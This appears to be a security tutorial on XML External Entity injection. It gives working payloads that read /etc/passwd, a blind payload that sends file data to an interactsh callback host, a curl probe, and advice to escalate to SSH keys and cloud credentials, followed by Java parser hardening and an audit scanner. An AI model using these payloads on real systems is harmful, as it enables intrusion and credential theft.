In 2021, a misconfigured XML parser in a healthcare portal exposed patient records to unauthenticated attackers via a classic XXE injection flaw. No authentication bypass was needed, just a crafted XML payload. XXE (XML External Entity) injection abuses how XML parsers resolve external entity references, letting attackers read local files, trigger SSRF, or exfiltrate data over blind out-of-band channels. If your application accepts XML anywhere (SOAP APIs, file uploads, document parsers), this attack surface is worth your full attention.
How XXE Works: Reading Local Files
XML supports a feature called external entities — references that tell the parser to fetch content from a URI or local path. Parsers with this feature enabled will dutifully resolve those references, even when the XML comes from an untrusted user.
Here’s the classic payload. Suppose the app at https://portal.internalcorp.local/api/upload accepts an XML document for invoice processing:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE invoice [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<invoice>
<vendor>&xxe;</vendor>
<amount>5000</amount>
</invoice>
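When the parser hits &xxe;, it resolves the entity by reading /etc/passwd and substitutes the file contents into the vendor element, which the application then echoes back in its response. Because /etc/passwd is world-readable, even a low-privilege server process leaks the account names. Password hashes live in /etc/shadow, which is normally readable only by root, so you get those only if the parser runs as root and you point the entity at that file. The response might look like this: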
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "received",
"vendor": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\njdoe:x:1001:1001:John Doe,,,:/home/jdoe:/bin/bash"
}
You’ve confirmed XXE is exploitable. User jdoe is a local account — a natural pivot target. Next step: escalate to reading SSH private keys at file:///home/jdoe/.ssh/id_rsa, or start probing internal services using http:// URIs for SSRF.
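To see the mechanism from the parser's side, here is a minimal Java sketch of what a default-configured JAXP parser does with the invoice payload. It assumes a stock JDK with unmodified JAXP settings, and it points the entity at a harmless temporary file rather than /etc/passwd. The class and method names (EntityExpansionDemo, vendorText, payloadFor, demo) are hypothetical and not taken from any real application.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Hypothetical demo class: shows entity resolution with an unhardened factory.
final class EntityExpansionDemo {

    // Parses the XML with a factory left at its defaults and returns the <vendor> text.
    static String vendorText(String xml) {
        try {
            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); // no hardening applied
            Document doc = dbf.newDocumentBuilder()
                    .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return doc.getElementsByTagName("vendor").item(0).getTextContent();
        } catch (Exception e) {
            throw new IllegalStateException("parse failed", e);
        }
    }

    // Builds the invoice payload from the article with the entity pointing at the given file.
    static String payloadFor(Path target) {
        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
             + "<!DOCTYPE invoice [\n"
             + "<!ENTITY xxe SYSTEM \"" + target.toUri() + "\">\n"
             + "]>\n"
             + "<invoice><vendor>&xxe;</vendor><amount>5000</amount></invoice>";
    }

    // Writes a marker to a temp file, parses a payload that references it, then cleans up.
    static String demo() {
        try {
            Path harmless = Files.createTempFile("xxe-demo", ".txt");
            try {
                Files.writeString(harmless, "harmless-marker");
                return vendorText(payloadFor(harmless));
            } finally {
                Files.delete(harmless);
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(demo());
    }
}
```

With default settings the marker text is expected to come back as the vendor value, which is the same substitution that put /etc/passwd into the JSON response above. If it does not, the runtime has likely been configured with stricter JAXP defaults.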
Blind XXE: Exfiltrating Data Out-of-Band
Most real-world XXE bugs are blind — the server processes your XML but doesn’t echo the entity value back in the response. You need an out-of-band channel. The standard technique is to make the parser send a DNS or HTTP request to a server you control.
Set up a listener first. interactsh is a purpose-built tool for catching out-of-band callbacks — think Burp Collaborator but open source.
# Start an interactsh client to get a unique callback URL
$ interactsh-client
[INF] Listing on unique.r4nd0m.interact.sh
[INF] Waiting for interactions...
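Now craft a two-stage XXE payload using parameter entities. The first entity loads your target file; the second embeds that value in the query string of an HTTP request to your server. The value is inserted raw, not URL-encoded, so this works best for short single-line files. One caveat: conforming parsers do not expand a parameter-entity reference such as %secret; inside a declaration in the internal DTD subset, so the inline form shown here is a simplification. In practice the declarations are usually served from an external DTD that the payload loads with a single parameter entity, and a wrapper entity there builds the exfiltration URL once the file contents have been substituted.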
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % secret SYSTEM "file:///etc/hostname">
<!ENTITY % oob SYSTEM "http://unique.r4nd0m.interact.sh/?data=%secret;">
%oob;
]>
<foo>trigger</foo>
Submit this in a POST request to /api/process on your target at 192.0.2.47, then watch your interactsh terminal:
[INF] Received interaction from 192.0.2.47
GET /?data=prod-invoiceserver-01 HTTP/1.1
Host: unique.r4nd0m.interact.sh
User-Agent: Java/11.0.15
Two things just happened. The hostname prod-invoiceserver-01 leaked, which is useful for internal network mapping. And the User-Agent revealed that the server runs Java 11, which narrows the set of applicable exploits considerably. From here, escalate by swapping /etc/hostname for /proc/self/environ to grab environment variables, which often contain AWS keys, database credentials, or API tokens in cloud deployments. Expect this to be less reliable: that file uses NUL separators, and newlines or other special characters in a file's contents often break the callback URL.
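When many callbacks arrive, pulling the leaked value out of each request line by hand gets tedious. The following is a small sketch of that step, assuming the data arrives in a query parameter as in the interaction log above. CallbackParser and queryValue are hypothetical names, not part of interactsh.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.Optional;

// Hypothetical helper for triaging out-of-band callbacks.
final class CallbackParser {

    // Returns the decoded value of `param` from a request line such as
    // "GET /?data=value HTTP/1.1", or empty if the parameter is absent.
    static Optional<String> queryValue(String requestLine, String param) {
        String[] parts = requestLine.trim().split("\\s+");
        if (parts.length < 2) {
            return Optional.empty(); // not a well-formed request line
        }
        String target = parts[1];
        int q = target.indexOf('?');
        if (q < 0) {
            return Optional.empty(); // no query string at all
        }
        for (String pair : target.substring(q + 1).split("&")) {
            int eq = pair.indexOf('=');
            if (eq > 0 && pair.substring(0, eq).equals(param)) {
                // URLDecoder also turns '+' into a space, as in form encoding.
                return Optional.of(URLDecoder.decode(pair.substring(eq + 1), StandardCharsets.UTF_8));
            }
        }
        return Optional.empty();
    }

    public static void main(String[] args) {
        System.out.println(queryValue("GET /?data=prod-invoiceserver-01 HTTP/1.1", "data").orElse("(none)"));
    }
}
```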
Finding XXE in the Wild: Automated Discovery
Manual crafting works, but at scale you need tooling. dalfox handles XSS, not XXE; for XXE, Burp’s active scanner and XXEinjector are common choices. For quick CLI-based probing, many testers use curl plus a local HTTP server to confirm the callback.
# Create an empty probe file so the listener answers 200, then listen and inject
$ touch xxe-probe
$ python3 -m http.server 8080 &
$ curl -s -X POST https://192.0.2.47/api/upload \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://192.0.2.1:8080/xxe-probe">]><x>&xxe;</x>'
# Your http.server output:
192.0.2.47 - - [28/Jun/2026 09:14:32] "GET /xxe-probe HTTP/1.1" 200 -
That inbound GET request from 192.0.2.47 is your proof of concept. The parser resolved the external entity and reached out to your machine — XXE confirmed in under 30 seconds. Document the request and response pair verbatim; that’s your reproduction evidence for the report.
Defending Against XXE
The fix is disabling external entity processing at the parser level — not input validation, not a WAF rule. In Java’s JAXP:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Reject any document that contains a DOCTYPE declaration
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense in depth: refuse external general and parameter entities
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
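The disallow-doctype-decl feature does most of the work: it rejects any document that carries a DOCTYPE, which blocks entity declarations outright. The two external-entity features are defense in depth and become the primary control if you ever have to allow DOCTYPEs, so set all three. For Python’s lxml, pass resolve_entities=False and no_network=True to the parser. For .NET, set DtdProcessing = DtdProcessing.Prohibit and XmlResolver = null on your XmlReaderSettings.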
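The JAXP settings can be wrapped in one factory method so that every call site gets the same hardened parser. This is a minimal sketch under that assumption. HardenedXml, newBuilder, and accepts are hypothetical names, and the two extra setters (XInclude and entity expansion) are additional precautions beyond the three features discussed here.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

// Hypothetical helper: one place to create hardened DOM parsers.
final class HardenedXml {

    // Returns a DocumentBuilder that refuses DOCTYPEs and external entities.
    static DocumentBuilder newBuilder() {
        try {
            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
            dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
            dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            dbf.setXIncludeAware(false);          // extra precaution, not from the article
            dbf.setExpandEntityReferences(false); // extra precaution, not from the article
            return dbf.newDocumentBuilder();
        } catch (ParserConfigurationException e) {
            // Fail closed: an implementation that cannot be hardened should not be used.
            throw new IllegalStateException("XML parser does not support required hardening", e);
        }
    }

    // Returns true if the hardened parser accepts the document, false if it rejects it.
    static boolean accepts(String xml) {
        try {
            newBuilder().parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return true;
        } catch (SAXException e) {
            return false; // includes the "DOCTYPE is disallowed" rejection
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        String xxe = "<?xml version=\"1.0\"?><!DOCTYPE invoice ["
                   + "<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
                   + "<invoice><vendor>&xxe;</vendor></invoice>";
        System.out.println("plain invoice accepted: " + accepts("<invoice><vendor>Acme</vendor></invoice>"));
        System.out.println("XXE payload accepted:   " + accepts(xxe));
    }
}
```

Throwing when a feature cannot be set is a deliberate choice in this sketch: silently falling back to an unhardened parser would reintroduce the bug.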
What To Do Now: Grep your codebase for XML parser initialization. Search for DocumentBuilderFactory, XMLReader, lxml.etree, or XmlDocument. For every hit, verify that external entity resolution is explicitly disabled. One unguarded parser instance is all it takes.
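If grep is not convenient, the same audit can be sketched in a few lines of Java. The example below walks a source tree and reports every line that mentions one of the four identifiers listed above. XmlParserAudit, scanLines, and findParserUses are hypothetical names, and a hit only marks a place to review by hand; it says nothing about whether that parser is hardened.

```java
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;
import java.util.stream.Collectors;
import java.util.stream.Stream;

// Hypothetical audit helper: lists candidate XML parser initializations.
final class XmlParserAudit {

    // The identifiers named in the article; extend for other parsers in your stack.
    private static final Pattern PARSER_HINT =
            Pattern.compile("DocumentBuilderFactory|XMLReader|lxml\\.etree|XmlDocument");

    // Returns "label:lineNumber: text" for every line that mentions a parser identifier.
    static List<String> scanLines(String label, List<String> lines) {
        List<String> hits = new ArrayList<>();
        for (int i = 0; i < lines.size(); i++) {
            if (PARSER_HINT.matcher(lines.get(i)).find()) {
                hits.add(label + ":" + (i + 1) + ": " + lines.get(i).trim());
            }
        }
        return hits;
    }

    // Walks the tree under root and scans every regular file.
    static List<String> findParserUses(Path root) {
        List<String> hits = new ArrayList<>();
        try (Stream<Path> walk = Files.walk(root)) {
            List<Path> files = walk.filter(Files::isRegularFile).sorted().collect(Collectors.toList());
            for (Path file : files) {
                // ISO-8859-1 maps every byte to a character, so binary files do not abort the scan.
                hits.addAll(scanLines(file.toString(), Files.readAllLines(file, StandardCharsets.ISO_8859_1)));
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return hits;
    }

    public static void main(String[] args) {
        Path root = Path.of(args.length > 0 ? args[0] : ".");
        findParserUses(root).forEach(System.out::println);
    }
}
```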
